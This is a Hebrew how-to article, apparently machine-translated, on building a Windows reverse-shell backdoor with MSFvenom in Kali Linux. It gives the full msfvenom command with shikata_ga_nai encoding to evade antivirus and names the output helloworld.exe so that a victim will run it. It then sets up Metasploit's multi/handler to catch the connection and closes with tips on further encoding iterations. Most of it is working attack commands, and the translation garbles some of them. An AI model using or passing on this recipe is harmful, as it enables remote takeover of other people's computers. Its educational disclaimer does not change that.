כיצד ליצור דלת אחורית כמעט שלא ניתנת לזיהוי באמצעות MSFvenom בקאלי לינוקס?
דלת אחורית משמשת לעקיפת מנגנוני אבטחה, לרוב בחשאי ובעיקר ללא גילוי. באמצעות MSFvenom, השילוב של msfpayload ו- msfencode, ניתן ליצור דלת אחורית המתחברת חזרה לתוקף באמצעות TCP פגז הפוך. על מנת לפתח דלת אחורית, עליך לשנות את חתימת התוכנה הזדונית שלך כדי להתחמק מתוכנת אנטי-וירוס כלשהי. השלם את הפרויקט על זוג מחשבים שיש לך הרשאה לגשת אליהם, ובתוך כך תוכלו ללמוד עוד על אבטחת מחשבים וכיצד פועל סוג זה של דלת אחורית.
- 1הפעל את הקאלי והדליק את קונסולת המסוף.
- 2הקלד ifconfig כדי להציג את הממשק ובדוק את כתובת ה- IP שלך.
- 3הקלד msfvenom -l encoders כדי להציג את רשימת המקודדים.
- אתה ישמש x86/shikata_ga_nai כמקודד.
- 4הקלד "msfvenom -a x86 - פלטפורמת windows -p windows / shell / reverse_tcp LHOST = 192,168.48,129 lport = 4444 -b" \ x00" -e x86 / shikata_ga_nai -f exe> helloworld.exe
- -a x86 - platform windows מייעד אדריכלות לשימוש.
- -p windows/shell/reverse_tcp מייעד את המטענים להטמיע.
- LHOST מייעד את כתובת ה- IP של המאזין.
- LPORT מייעד את נמל המאזין.
- -b "\x00" מייעד להימנע מאופי רע (בתים null).
- -e x86/shikata_ga_nai מייעד את שם המקודדים.
- -f exe > helloWorld.exe מייעד פלט פורמט.
- 5הקלד msfconsole כדי להפעיל את metasploit.
- עכשיו יצרת את הדלת האחורית שלך. כאשר הקורבן לוחץ על helloWorld.exe, מטען הקליפה המוטמע יופעל ויהיה חיבור חזרה למערכת שלך. על מנת לקבל את החיבור, עליך לפתוח את המטפל המרובה ב- Metasploit ולהגדיר את המטענים.
- 6סוג use exploit/multi/handler.
- 7סוג set payload windows/shell/reverse_tcp.
- 8הקלד show options כדי לבדוק את המודול.
- 9סוג set LHOST 192,168.48,129.
- "LHOST" מייעד את כתובת ה- IP של המאזין.
- 10סוג set LPORT 4444.
- "LPORT" מייעד את יציאת המאזינים.
- 11הקלד run והמתן לחיבור ממכונת הקורבן.
- 12המתן שהקורבן ילחץ על helloworld.exe. ואז תחובר בהצלחה למכונה של הקורבן.
- שימוש ב- i <numbers> ב- MSFvenom יציג את האיטרציות של קידוד. לפעמים איטרציות נוספות עשויות לעזור להתחמק מתוכנת ה- AV.
- למדת כיצד ליצור את הדלת האחורית ולקודד באמצעות MSFvenom, אך שיטה זו לא תפעל בצורה מושלמת כנגד חלק מתוכנות ה- AV בימינו. הסיבה מאחורי זה היא בגלל תבניות הביצוע ב- MSFvenom. ספקי ה- AV הוסיפו את החתימה הסטטית של תבניות אלה ופשוט חיפשו אותן. הפתרון לבעיה זו הוא שימוש בתבנית ביצוע אחרת או בכלים שונים.
- מאמר זה מיועד למטרות חינוכיות בלבד. פריצה ללא אישור או אישור אינה אתית ולעתים קרובות אינה חוקית.
- קאלי לינוקס
- חלונות
- מכונה וירטואלית
- VirtualBox
- VMware
שאלות ותשובות
- מה עלי לעשות אם מופיעה שגיאה בעת יצירת הניצול?וודא שעשית הכל נכון ונסה שוב. ודא שאתה מפעיל את Kali Linux.